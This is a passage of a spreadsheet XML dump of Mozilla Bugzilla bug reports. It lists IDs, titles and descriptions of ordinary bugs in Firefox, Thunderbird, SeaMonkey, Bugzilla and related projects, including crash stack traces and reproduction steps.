    <t>a11y: range needs to support more keyboard shortcuts</t>
  </si>
  <si>
    <t>as per http://www.mozilla.org/access/toolkit-checklist
Keyboard support for moving slider: arrow keys home end PgUp PgDn.  Right now xf:range supports the left and right arrow keys.  So we need to support home end PgUp and PgDn
AaronL: Home and end seem pretty self-explaining.  But what about page up and page down?  I assume that those increment and decrement the slider like the left and right arrow keys right?  That is what they do in XSmiles at least.</t>
  </si>
  <si>
    <t>FIREFOX-222602</t>
  </si>
  <si>
    <t>Favicon appears briefly in location bar when not web root favicon.ico</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.6a) Gecko/20031016 Firebird/0.7+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.6a) Gecko/20031016 Firebird/0.7+
If you go to http://aaguide.co.nz/main/index.shtml you see a site icon
(favicon) in the URL bar. But if you reload the page it vanishes. No matter how
many times you reload (or ctrl-reload or cmd-reload) the page it's still gone.
If you clear the cache it comes back. 
Reproducible: Always
Steps to Reproduce:
1.Navigate to http://aaguide.co.nz/main/index.shtml
2.Observe that the black and yellow AA favicon is present in the URL bar
3.Reload the page and observe that the URL bar now displays a generic icon.
Actual Results:  
Site icon (favicon) was missing from the URL bar. It had a generic page icon
instead.
Expected Results:  
Displayed the correct favicon.
This seems to be the same type of problem as bug 109959 however that bug dealt
with a problem in the Seamonkey browser. This bug seems to be specific to
Firebird as the web page in question seems to be handled correctly with the
standard Mozilla browser. For that reason I'm assuming this warrants a separate
bug.
The problem exists in the latest nightly builds of Firebird on both Windows and
OS X.
The problem page uses  to
define the page icon. It doesn't have a corresponding REL=icon line.
If I save the entire page locally and load it from my computer the problem goes
away. I can keep reloading the page and the icon remains in the URL bar. Could
this be because it's not using the cache?
As a side note the icon continues to be shown on the tab and the bookmarks
sidebar. However it refuses to appear in the bookmarks menu of the Windows
browser at any stage (Mac version doesn't show favicons in that menu anyway)
but maybe that's a separate bug (?).</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-460220</t>
  </si>
  <si>
    <t>Integrate new sumo search admin</t>
  </si>
  <si>
    <t>The bare bones admin interface needs to be integrated into the admin area</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-477844</t>
  </si>
  <si>
    <t>DOM Inspector 2.0.4</t>
  </si>
  <si>
    <t>Folks - please don't add bugs to the dependent list.  If you think a bug should
be in the release add a comment and I'll agree/disagree with my reasoning.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-225972</t>
  </si>
  <si>
    <t>GetMIMEInfoForExtensionFromDS returns success even if nothing was found</t>
  </si>
  <si>
    <t>this should set rv to failure if !contentTypeNodeResource or soemthing like that.</t>
  </si>
  <si>
    <t>CORE-310653</t>
  </si>
  <si>
    <t>###!!! ASSERTION: Incorrect aDocument: '!aParent || aParent-&gt;GetCurrentDoc() == aDocument'</t>
  </si>
  <si>
    <t>This assertion stems from bug 278472 and bz's checkin to trunk.  Testcase coming
up in a few moments.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-323430</t>
  </si>
  <si>
    <t>ftp directory containing the latest nightly branch build of lightning</t>
  </si>
  <si>
    <t>After the solution of bug 315619 branch tinderbox/nightlies of lightning are created. Currently they have to be downloaded every day from another directory like ftp.mozilla.org/pub/mozilla.org/calendar/lightning/nightly/2006-01-14-07-mozilla1.8/
Please create a directory at the ftp server that contains always the latest tinderbox/nightly branch build of lightning 
similar to what exist for the trunk builds at
ftp.mozilla.org/pub/mozilla.org/calendar/lightning/nightly/latest-trunk/</t>
  </si>
  <si>
    <t>BUGZILLA-340848</t>
  </si>
  <si>
    <t>page.cgi?id=fields.html still contains obsolete values for Platform and OS</t>
  </si>
  <si>
    <t>page.cgi?id=fields.html still contains obsolete values for Platform and OS.
After introducing the ability to customize the Platform and OS values new Bugzilla installations get only a couple set of values.
On a new BZ install Platform is:
- all
- PC
- Macintosh
- Other
and OS is:
- All
- Windows
- Linux
- Mac OS
- Other
The other values in the fields.html template must go.</t>
  </si>
  <si>
    <t>THUNDERBIRD-378635</t>
  </si>
  <si>
    <t>Tracking Bug: Bugs to Fix in TB2.0.0.x before offering a major update</t>
  </si>
  <si>
    <t>This is a tracking bug for bugs/regressions from 1.5.0.x which we want to address before we offer a major update via AUS for 1.5.0.x users to Thunderbird 2.0.0.x.</t>
  </si>
  <si>
    <t>CORE-354595</t>
  </si>
  <si>
    <t>Crash setting flashEmbed[0] in Flash Player code called from nsJSObjWrapper::GetNewOrUsed</t>
  </si>
  <si>
    <t>This crashes if emb is a Flash movie:
  var emb = document.getElementById(emb)
  emb[0] = 3
Stack trace (note that the symbols for Flash Player are bogus):
0   ...romedia.Flash Player.plugin 	0x06b63b38 Flash_EnforceLocalSecurity + 374272
1   ...romedia.Flash Player.plugin 	0x06b638a4 Flash_EnforceLocalSecurity + 373612
2   ...romedia.Flash Player.plugin 	0x06cce754 native_ShockwaveFlash_TCallFrame + 452328
3   ...romedia.Flash Player.plugin 	0x06cce6f4 native_ShockwaveFlash_TCallFrame + 452232
4   org.mozilla.firefox            	0x007f6e50 nsJSObjWrapper::GetNewOrUsed(_NPP* JSContext* JSObject*) + 2956
5   libmozjs.dylib                 	0x2304c2e0 js_LookupPropertyWithFlags + 684
6   libmozjs.dylib                 	0x23030b2c js_CheckRedeclaration + 84
7   libmozjs.dylib                 	0x23048ea8 js_HasOwnPropertyHelper + 1156
8   libmozjs.dylib                 	0x2302ff28 js_Invoke + 1828
9   libmozjs.dylib                 	0x2303a4d0 js_Interpret + 37512
...</t>
  </si>
  <si>
    <t>CORE-492751</t>
  </si>
  <si>
    <t>spell checking disabled when indenting text in HTML composition</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b5pre) Gecko/20090513 SeaMonkey/2.0b1pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b5pre) Gecko/20090513 SeaMonkey/2.0b1pre
Speel checking works fine when composing Email in HTML. However when a whole paragraph is indented right (text indent move right) then the spellchecker become inoperative.
When the paragraph is moved back left (text indent move left) then spellchecking works again.
Reproducible: Always
Steps to Reproduce:
1.start composing an Email with a few typos: spellchecking underline red the typos.
2.move the paragraph right (indent text)
3.all red underlining disappear
4.move back left the paragraph red underlining reappear
Expected Results:  
Spellchecking should work whatever the text position in the mail composing window.
I have tested this behavior with SM2.0 both on Linux and Windows platforms.</t>
  </si>
  <si>
    <t>u331436</t>
  </si>
  <si>
    <t>CORE-108310</t>
  </si>
  <si>
    <t>clean up GetFrameForPoint</t>
  </si>
  <si>
    <t>GetFrameForPoint uses nsresult in a silly way (kinda like NS_COMFALSE but not
quite so bad).  It should probably just be NS_IMETHOD_(PRBool) and return
PR_TRUE when it finds the point and PR_FALSE when it doesn't find the point.</t>
  </si>
  <si>
    <t>TOOLKIT-397135</t>
  </si>
  <si>
    <t>tree._ensureColumnOrder dies if no columns are defined</t>
  </si>
  <si>
    <t>Created attachment 281909
easy fix
DOM-Manipulating a  without any  elements (yet) results in:
JavaScript error: chrome://global/content/bindings/tree.xml line 134: this.columns has no properties</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-164707</t>
  </si>
  <si>
    <t>Provide a way to view/delete orphan certs</t>
  </si>
  <si>
    <t>Provide a way to view/delete orphan certs
Mozilla should provide a way to have a look at the list of certs that
Mozilla/NSS is storing in the user's profile but which are not classified as
any of the 4 categories user/other people/web sites/CA.
I'm not sure whether we want to enable a 5th tab orphans by default but at
least it can be helpful for analysis as bug 163900 shows.</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-458220</t>
  </si>
  <si>
    <t>Sisyphus - JavaScript Tests - bisect.sh does not use numeric comparisons on local revs</t>
  </si>
  <si>
    <t>Created attachment 341450
patch</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-352556</t>
  </si>
  <si>
    <t>buffer overflow for installcleanup [@ strcpy - main] regFilePath argument length isn't checked</t>
  </si>
  <si>
    <t>I'm not going to credit coverity or klocwork or the even older tool that netscape ran whose name i can't remember or dreftool.
i actually used installcleanupunix as an interview question for a couple of years because it was a good example of bad code which let me see how people debugged simple problems (it was a real eye opener to see how people approached it) and one of the interviewees spotted this gem (there were actually a couple of other gems in this file too i can't remember if this is the last interesting one).
installcleanup should not be running as root so nothing interesting should happen. and certainly it should never be suid.
the general program flow for installcleanup is that the old mozilla installer (which i believe isn't really used much anymore) would run it.</t>
  </si>
  <si>
    <t>CALENDAR-329035</t>
  </si>
  <si>
    <t>calendar view refresh() operation has re-entrancy problems</t>
  </si>
  <si>
    <t>The instance that I've noticed is that in multiday view calling refresh before an existing refresh request has completed is almost certain to confuse the view.  I suspect other views may have similar issues.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-211695</t>
  </si>
  <si>
    <t>Bugs in nsCertTree.cpp</t>
  </si>
  <si>
    <t>1. Cert tree doesn't use the right update notifications when changing the list
2. Cert tree doesn't locate the parent index correctly
3. Cert tree doesn't draw lines correctly (HasNextSibling unimplemented)
4. Cert tree shouldn't compare bools to bool constants</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-108085</t>
  </si>
  <si>
    <t>New server for tests on mozilla.org</t>
  </si>
  <si>
    <t>I have spare hardware that we can use to serve jrgm's page-layout test
as well as serving up startup time histories.  I think it would be
good to have a machine that's not tied to bugzilla etc. is this
hard to put this machine on the mozilla.org subnet?</t>
  </si>
  <si>
    <t>SEAMONKEY-202984</t>
  </si>
  <si>
    <t>Right clicking on Mozilla and selecting 'Preferences' does not work</t>
  </si>
  <si>
    <t>Under Windows XP right clicking on the Mozilla icon in the Start menu and
selecting Preferences throws an error about not being able to find:
  mozilla.exe.exe-chrome chrome//communicator/content/pref/pref.xul
The problem is that a ' ' (space) character is needed before the '-chrome...'. 
The problem looks like it's coming from here:
http://lxr.mozilla.org/seamonkey/source/xpfe/components/winhooks/nsWindowsHooksUtil.cpp#415
patch coming right up.</t>
  </si>
  <si>
    <t>DEVELOPER_DOCUMENTATION-448880</t>
  </si>
  <si>
    <t>TryServer doc should be updated to hg requirements</t>
  </si>
  <si>
    <t>The tryserver doc section Notes on creating patches  focuses on CVS while the trunk is hg.
It would be helpful to mention patchlevel 1 for hg diffs.
At least it would have saved me one red cycle</t>
  </si>
  <si>
    <t>CORE-484122</t>
  </si>
  <si>
    <t>geolocation timeout due to string change</t>
  </si>
  <si>
    <t>Created attachment 368173
patch v.1
when strings were change:
http://hg.mozilla.org/mozilla-central/rev/c0eea14622a6
our mochitest failed:
Unknown Error: command finished with exit code: 2
*** 41419 ERROR TEST-UNEXPECTED-FAIL | /tests/dom/tests/mochitest/geolocation/test_allowCurrent.html | Clicked Exact Location (within 10 feet) button
buildbot.slave.commands.TimeoutError: command timed out: 300 seconds without output killing pid 30879
This is due to the test cases relying on the actual text of the string in the buttons of the notification info bar.  This is pretty weak but other mochitest do the same thing.
This is a quick fix.  we should actually not rely on the text of the buttons but rather their id or something that doesn't change.</t>
  </si>
  <si>
    <t>TOOLKIT-383619</t>
  </si>
  <si>
    <t>Get xpcshell tests for mozStorage</t>
  </si>
  <si>
    <t>We have a c++ test file but it isn't run with make check nor is it very comprehensive.</t>
  </si>
  <si>
    <t>CORE-723640</t>
  </si>
  <si>
    <t>IonMonkey: implement same RegExp native optimization as JM+TI</t>
  </si>
  <si>
    <t>There are comments in the MRegExp as to how you can reuse the source RegExp object without cloning it in certain situations (where you understand the uses to be exactly the no-escape-permitting natives).</t>
  </si>
  <si>
    <t>cdleary</t>
  </si>
  <si>
    <t>MOZILLA.ORG-398296</t>
  </si>
  <si>
    <t>cvs copies for bug 398078</t>
  </si>
  <si>
    <t>SeaMonkey is correcting a bit of its themes code and needs a cvs copy making.
The cvs copies file is attached to the original bug 398078 as attachment 282907 and has been reviewed and approved.</t>
  </si>
  <si>
    <t>TOOLKIT-616295</t>
  </si>
  <si>
    <t>Persistent failure of test_history_redirects.js</t>
  </si>
  <si>
    <t>Need to fix before merge.  Happened after my last merge from mozilla-central.</t>
  </si>
  <si>
    <t>THUNDERBIRD-270043</t>
  </si>
  <si>
    <t>TB09 crash importing Outlook Express settings [@ nsOEProfileMigrator::Notify]</t>
  </si>
  <si>
    <t>This is a topcrasher with Thunderbird 0.9 and looks like something we should try
to get in asap.  OE migration is something a lot of users will be using and
although 1.0 is here if we can get a quick fix I think we should get it in.
Here's the latest from Talkback:
Count   Offset    Real Signature
[ 47   nsOEProfileMigrator::Notify 6051e64f - nsOEProfileMigrator::Notify ]
[ 3   nsOEProfileMigrator::Notify 3f2448c3 - nsOEProfileMigrator::Notify ]
[ 1   nsOEProfileMigrator::Notify 8c1185e9 - nsOEProfileMigrator::Notify ]
[ 1   nsOEProfileMigrator::Notify 72461931 - nsOEProfileMigrator::Notify ]
     Crash date range: 05-NOV-04 to 14-NOV-04
     Min/Max Seconds since last crash: 42 - 56864
     Min/Max Runtime: 42 - 56864
     Count   Platform List 
     52   Windows XP [Windows NT 5.1 build 2600] 
     Count   Build Id List 
     52   2004110312
     No of Unique Users        51
 Stack trace(Frame) 
	 nsOEProfileMigrator::Notify
[e:/builds/tinderbox/thunderbird-branch/WINNT_5.0_Clobber/mozilla/mail/components/migration/src/nsOEProfileMigrator.cpp
 line 96] 
	 nsTimerImpl::Fire
[e:/builds/tinderbox/thunderbird-branch/WINNT_5.0_Clobber/mozilla/xpcom/threads/nsTimerImpl.cpp
 line 395] 
	 PL_HandleEvent
[e:/builds/tinderbox/thunderbird-branch/WINNT_5.0_Clobber/mozilla/xpcom/threads/plevent.c
 line 674] 
	 0x778b0c24  
	 nsBaseCommandController::DoCommand
[e:/builds/tinderbox/thunderbird-branch/WINNT_5.0_Clobber/mozilla/embedding/components/commandhandler/src/nsBaseCommandController.cpp
 line 131]  
     (1953159)	Comments: I was trying to import from Outlook... it was saying
that I couldn't do something with a draft... 
     (1920318)	Comments: import
     (1912608)	Comments: Installing the program and importing Outlook settings.
     (1907955)	Comments: importing data from outlook
     (1884701)	Comments: Ran Setup  told it to import existing Outlook info. 
Hung for a long time  so I clicked the [x] in the upper lefthand corner to kill
the window.
     (1871315)	Comments: Importing from Outlook 2003
     (1869910)	Comments: trying to copy outlook settings
     (1862890)	Comments: Launching Thunderbird for 1st time and importing setup
from OutLook
     (1861872)	Comments: Importing from Outlook during installation
     (1859894)	Comments: importing large pst file (900MB)
     (1850990)	Comments: initial import on install. Was processing. Accidentally
typed pwd into thunderbird import window. Import was not complete  then it said
it was finsished. 
     (1849607)	Comments: tried to install the programm...
     (1847168)	Comments: importing outlook settings
     (1846939)	Comments: I was importing my mail  seemed to have a problem with
drafts then died
     (1846838)	Comments: importing outlook info
     (1845287)	Comments: attempting to import outlook setting after initial install
     (1808063)	Comments: importing data from Outlook
     (1804626)	Comments: just finished installing Thunderbird.  The import
wizard was running  and was generating a large number of errors -- something
like error writing to temporary file or error creating draft while it was
importing messages from Outlook in the Draft
     (1804626)	Comments:  folder.
     (1769422)	Comments: Importing from outlook
     (1749782)	Comments: I had just installed thunderbird 0.9 and was going
through the import wizard to import my info from outlook 2003.  The window
showed 'currenting importing the following items...' (or whatever it's supposed
to say).  There was nothing below it except for
     (1749782)	Comments:  the progress bar.  The progress bar went from 0 to
100%  then changed back to 0% again (At least that's what it appeared to do) at
which point the wizard just sat there until I forcible closed it.
====================================================================================================
     Count   Offset    Real Signature
[ 44   nsOEProfileMigrator::Notify 8a226c9b - nsOEProfileMigrator::Notify ]
[ 3   nsOEProfileMigrator::Notify a163782f - nsOEProfileMigrator::Notify ]
[ 2   nsOEProfileMigrator::Notify 8e759709 - nsOEProfileMigrator::Notify ]
     Crash date range: 05-NOV-04 to 15-NOV-04
     Min/Max Seconds since last crash: 20 - 25857
     Min/Max Runtime: 20 - 25857
     Count   Platform List 
     20   Windows 98 [Windows 98 4.10 build 67766446] 
     13   Windows 2K [Windows NT 5.0 build 2195] 
     8   Windows ME [Windows 98 4.90 build 73010104] 
     4   Windows XP [Windows NT 5.1 build 2600] 
     2   Windows NT4.0 [Windows NT 4.0 build 1381] 
     2   Windows 98 [Windows 98 4.10 build 67766222] 
     Count   Build Id List 
     49   2004110312
     No of Unique Users        49
 Stack trace(Frame) 
	 nsOEProfileMigrator::Notify
[e:/builds/tinderbox/thunderbird-branch/WINNT_5.0_Clobber/mozilla/mail/components/migration/src/nsOEProfileMigrator.cpp
 line 96] 
	 nsTimerImpl::Fire
[e:/builds/tinderbox/thunderbird-branch/WINNT_5.0_Clobber/mozilla/xpcom/threads/nsTimerImpl.cpp
 line 395] 
	 PL_HandleEvent
[e:/builds/tinderbox/thunderbird-branch/WINNT_5.0_Clobber/mozilla/xpcom/threads/plevent.c
 line 674] 
	 0x778b0c24   
     (1959065)	Comments: Importation des param??tres d'eudora pendant
l'installation de Thunderbird (version fran??aise)
     (1951906)	Comments: downloading
     (1933006)	Comments: Stavo importando i dati da Outlook Express   volevo
importare solamente gli account e le rubriche   quando ha finito tale
importazione ha iniziato ad importare le cartelle di posta (che nel mio caso
erano enormi)  non volevo fare tale operazione ed ho
     (1933006)	Comments:  chiudo la finestra di importazione.
     (1932330)	Comments: Adressbuch von Outlookexpress importieren
     (1931724)	Comments: Thunberdird10 hung up during initial step to acquire
files from Outlook Express.
     (1931586)	Comments: transferring hings (it didn't say what) from Outlook
Express during setup.
     (1907162)	Comments: importing messages from Outlook
     (1907040)	Comments: installing thunderbird
     (1898899)	Comments: During installation while importing from Outlook Express
     (1898143)	Comments: Hung - would t load contacts from Otlook 2003 on
installation
     (1897038)	Comments: importing a large number of folders and messages from
Outlook  got message cannot save draft error writing temporary file
repeatedly until the whole program crashed.  i may be having hard drive problems
as i see memory errors sometimes.
     (1892967)	Comments: Completing setup by importing settings from Outlook Express
     (1890645)	Comments: Setting thunderbird up.
     (1882303)	Comments: Attempting to import address book from Outlook Express
     (1870897)	Comments: trying to install Thunderbird  retrieving info and data
from Outlook
     (1862822)	Comments: the system crashed while importing data fromMS Outlook
 the antivirus found some virus on my email files &amp; blocked the processs
Thunderbord crashed
     (1848073)	Comments: migrating from Outlook  thunderbird produced and error
message error writing file unable to save draft a large number of times
     (1844836)	URL: Failed to transfer settings from Outlook during install.
Locked up....
     (1844836)	Comments: Installing Thunderbird
     (1842307)	Comments: Attempted to download Thunderbird and it stalled?
     (1832475)	Comments: During installation Tbird was trying to import info
from Outlook.  I am changing email clients because Outlook went back to defaults
without my permission.
     (1781943)	Comments: importing from outlook express settings
     (1773165)	Comments: I had just installed  and I requested it import
settings from Outlook Express.  The progress bar moved only a tiny bit and then
the process seemed to freeze.  After a few minutes  I clicked the close (X)
button  and then I got an illegal operation
     (1773165)	Comments:  dialog from windows and the quality feeback agent came up.</t>
  </si>
  <si>
    <t>CORE-376032</t>
  </si>
  <si>
    <t>posinset and setsize incorrect for radio button groups</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a4pre) Gecko/20070329 Minefield/3.0a4pre
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a4pre) Gecko/20070329 Minefield/3.0a4pre
posinset and setsize are attributes of radio buttons that give information about the position of a radio button within a group and the size of the group.  I will attach a test page which shows that these attributes have been incorrectly set.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>BUGZILLA-208347</t>
  </si>
  <si>
    <t>The version of Chart::Base below 2.1 cannot be determined accurately</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3.1) Gecko/20030425
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3.1) Gecko/20030425
When running checksetup.pl during installation it reports that Chart::Base
0.99b must be installed.  If this direction is followed (as I did initially)
the time-based charts option will output a zero-length gif.  The install
documentation states that 0.99c is required I ended up installing the latest
currently available 2.2 and time-based charts now work correctly.
Reproducible: Always
Steps to Reproduce:
1. follow the requirements of checksetup.pl re installing Chart::Base 0.99b
2.
3.
Actual Results:  
time-based charts will output a zero-length gif
Expected Results:  
checksetup.pl should state Chart::Base that 0.99c is required</t>
  </si>
  <si>
    <t>TESTOPIA-426464</t>
  </si>
  <si>
    <t>Loosing the entire Test Plan text when cloning</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13
Build Identifier: 
Loosing the entire Test Plan text when cloning
Reproducible: Always
Steps to Reproduce:
1. Select existing test plan with the text within Plan document
2.Clone Test Plan with the option Copy plan document selected
Actual Results:  
Text for the new version is lost. The only message within the Plan Document is like HASH(0x90e034c)</t>
  </si>
  <si>
    <t>SEAMONKEY-190529</t>
  </si>
  <si>
    <t>create linux sdk tar.gz file</t>
  </si>
  <si>
    <t>We create an embed-i686-pc-linux-gnu.tar.gz file but no sdk tar.gz that
developers can write apps against.
The fix is to tar.gz dist/sdk and spit it out.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-350179</t>
  </si>
  <si>
    <t>crash while loading headers for an IMAP folder [@ nsImapProtocol::NormalMessageEndDownload]</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.8.0.3) Gecko/20060523 Ubuntu/dapper Firefox/1.5.0.3
Build Identifier: Mozilla Thunderbird version 1.5.0.2 (20060820)
While loading the Bulk-Mail folder on my mail server thunderbird dumps core. The coredump is nearly at the end of the header download and seems to originate from the following location.
(gdb) thread 2
[Switching to thread 2 (process 22704)]#0  0x00002aaaab44636e in raise () from /lib/libpthread.so.0
(gdb) bt
#0  0x00002aaaab44636e in raise () from /lib/libpthread.so.0
#1  0x0000000000417d30 in nsProfileLock::FatalSignalHandler (signo=11) at nsProfileLock.cpp:206
#2  
#3  0x00002aaab3305e04 in nsImapProtocol::NormalMessageEndDownload (this=0x2b58010) at nsImapProtocol.cpp:3390
#4  0x00002aaab3326cd2 in nsImapServerResponseParser::msg_fetch (this=0x2b582a8) at nsImapServerResponseParser.cpp:1216
#5  0x00002aaab33276bc in nsImapServerResponseParser::numeric_mailbox_data (this=0x2b582a8) at nsImapServerResponseParser.cpp:1012
#6  0x00002aaab3324df6 in nsImapServerResponseParser::response_data (this=0x2b582a8 advanceToNextLine=1) at nsImapServerResponseParser.cpp:752
#7  0x00002aaab331f200 in nsImapServerResponseParser::ParseIMAPServerResponse (this=0x2b582a8 
    currentCommand=0x2cb40a0 4 UID fetch 54864:5486754869:5487754880:5489154893:56756 (UID RFC822.SIZE FLAGS BODY.PEEK[HEADER.FIELDS (From To Cc Subject Date Message-ID Priority X-Priority References Newsgroups In-Reply-To Con... aIgnoreBadAndNOResponses=0) at nsImapServerResponseParser.cpp:246
#8  0x00002aaab33004e4 in nsImapProtocol::ParseIMAPandCheckForNewMail (this=0x2b58010 
    commandString=0x2cb40a0 4 UID fetch 54864:5486754869:5487754880:5489154893:56756 (UID RFC822.SIZE FLAGS BODY.PEEK[HEADER.FIELDS (From To Cc Subject Date Message-ID Priority X-Priority References Newsgroups In-Reply-To Con... aIgnoreBadAndNOResponses=0) at nsImapProtocol.cpp:1502
#9  0x00002aaab330ed3f in nsImapProtocol::FetchMessage (this=0x2b58010 messageIds=0xfd9878 54864:5486754869:5487754880:5489154893:56756 
    whatToFetch=kHeadersRFC822andUid idIsUid=1 startByte=0 endByte=0 part=0x0) at nsImapProtocol.cpp:3012
#10 0x00002aaab3313a37 in nsImapProtocol::FolderMsgDumpLoop (this=0x2b58010 msgUids=0x19258a0 msgCount=1354 fields=kHeadersRFC822andUid) at nsImapProtocol.cpp:3729
#11 0x00002aaab3313b0e in nsImapProtocol::FolderMsgDump (this=0x2b58010 msgUids=0x19258a0 msgCount=1354 fields=kHeadersRFC822andUid) at nsImapProtocol.cpp:3630
#12 0x00002aaab3313b46 in nsImapProtocol::FolderHeaderDump (this=0x2b58010 msgUids=0x19258a0 msgCount=1354) at nsImapProtocol.cpp:3610
#13 0x00002aaab331aa63 in nsImapProtocol::ProcessMailboxUpdate (this=0x2b58010 handlePossibleUndo=1) at nsImapProtocol.cpp:3576
#14 0x00002aaab33163a7 in nsImapProtocol::ProcessSelectedStateURL (this=0x2b58010) at nsImapProtocol.cpp:2167
#15 0x00002aaab3319115 in nsImapProtocol::ProcessCurrentURL (this=0x2b58010) at nsImapProtocol.cpp:1378
#16 0x00002aaab3319e8d in nsImapProtocol::ImapThreadMainLoop (this=0x2b58010) at nsImapProtocol.cpp:1140
#17 0x00002aaab331a026 in nsImapProtocol::Run (this=0x2b58010) at nsImapProtocol.cpp:931
Reproducible: Always
Steps to Reproduce:
1. Open thunderbird 
2. Login
3. Open Bulk Mail folder
4. Wait for thunderbird to segv
The thunderbird is built from ubuntu source debs and with -g no-strip with all the patches that ubuntu ships. 
The servers being hit are two of my office servers tunnelled over ssh. One of them is a dovecot over SSL (9930). The other is a homebrew (in-house) IMAP server which runs over NFS off a NetApp filer with replication. That's the one that's causing the crash here.
In short the server is not to be trusted and could be sending bad input. But even then it should give an error gracefully not SEGV</t>
  </si>
  <si>
    <t>gopalv82</t>
  </si>
  <si>
    <t>SEAMONKEY-164918</t>
  </si>
  <si>
    <t>This page cannot be displayed</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U WinNT4.0 en-US rv:1.1) Gecko/20020826
Build Identifier: Mozilla/5.0 (Windows U WinNT4.0 en-US rv:1.1) Gecko/20020826
After a delay it comes up to the This page cannot be displayed page I ge the
same result on MAC (ver 1.0) and WIN Ver 1.1.  The page does display in IE (MAC
&amp; WIN) and in Cyberdog on the Mac. 
Reproducible: Always
Steps to Reproduce:
1.Access the above URL
2.
3.
Actual Results:  
Go the This page cannot be displayed
Expected Results:  
Shown the page
NONE</t>
  </si>
  <si>
    <t>vze35xda</t>
  </si>
  <si>
    <t>BUGZILLA-388099</t>
  </si>
  <si>
    <t>[Windows] Remove ppm repo up instructions for ActiveState builds 819 and higher</t>
  </si>
  <si>
    <t>In ActiveState Build 819 and higher it's not necessary to do ppm repo up and in fact the command fails. This confuses people on the support list.
So we have to find out how to discover what Build we're running.</t>
  </si>
  <si>
    <t>CORE-308736</t>
  </si>
  <si>
    <t>Caret is invisible when entering an empty designmode field.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b4) Gecko/20050908 Firefox/1.4
When an designmode field is still empty when you enter by clicking the mouse in
it you don't see a cursor. The cursor will appear only after you start typing
characters.
Reproducible: Always
Steps to Reproduce:
1. visit the site
2. click 'view source'
3. delete everything
4. unclick 'view source' (remove check)
5. click with mouse in textfield
Actual Results:  
You don't see a focus or an blinking cursor. Or any cursor what so ever...
Expected Results:  
In a normal textfield or textarea when you it gets the focus you see a
blinking cursor.
Problem happens under Windows XP but also under MacOSX (Tiger) with using
Firefox 1.5 beta 1 or Camino 1.0a1.</t>
  </si>
  <si>
    <t>egonknapen</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-32051</t>
  </si>
  <si>
    <t>messages to -request addresses leak into the newsgroup</t>
  </si>
  <si>
    <t xml:space="preserve">(un)subscribe messages to mozilla-foo-request@mozilla.org seem to be leaking 
into the n.p.m.foo newsgroup. At least in the two newish groups win32 and 
mstone
Here is a sample post from the newsgroup. Note it is addressed to -request and 
the Path: appears to show it coming from the mail-&gt;news gateway.
Path: secnews.netscape.com!gateway
From: stephendonner@earthlink.net (Stephen Donner)
Newsgroups: netscape.public.mozilla.win32
Subject: subscribe
Date: 15 Mar 2000 03:50:29 GMT
Organization: Another Netscape Collabra Server User
Lines: 3
Message-ID: 
NNTP-Posting-Host: h-207-200-73-41.netscape.com
Mime-Version: 1.0
Content-Type: text/plain charset=iso-8859-1
Content-Transfer-Encoding: 7bit
To: </t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-383649</t>
  </si>
  <si>
    <t>Make all test tinderboxen use same terminology</t>
  </si>
  <si>
    <t>Quickparse.txt uses both test perf and perf test to describe perf test boxes. It would be nice if this was the same for the purposes of nagios reporting.</t>
  </si>
  <si>
    <t>daniel.n.chen</t>
  </si>
  <si>
    <t>CORE-100243</t>
  </si>
  <si>
    <t>Cannot install NS into directory with some double-byte characters name</t>
  </si>
  <si>
    <t>Build: 2001-09-17
Steps:
1. Pre-create a new directory name it with the double-byte characters in 
attached files (the characters are entered using Phonetic and Korean (Hangul) 
IME). 
2. Start installer follow the steps till Setup Type dialog appears.
3. Click Browse button to bring up Select a directory dialog.
4. Select the directory created in step 1.
Actual: 
1. The double-byte directory name is garbled.
2. When click OK Select a directory dialog closes itself and the double-byte 
named directory is not selected.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-328026</t>
  </si>
  <si>
    <t>[FAYT] typing a composed/accented character starts FAYT in Midas and selects character (when autostart is enabled)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.1) Gecko/20060214 Camino/1.0
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.1) Gecko/20060214 Camino/1.0
When editing rich text in Gmail and typing characters with accents (such as Ã¡ or Ã¼) on keyboards that require two keystrokes to do so (such as Dutch or U.S.) typing the accent mark starts find-as-you-type. This is really annoying as it can cause you to overwrite text you've just written (since find-as-you-type selects it) or make the text editing field lose focus (depending on the circumstances).
Reproducible: Always
Steps to Reproduce:
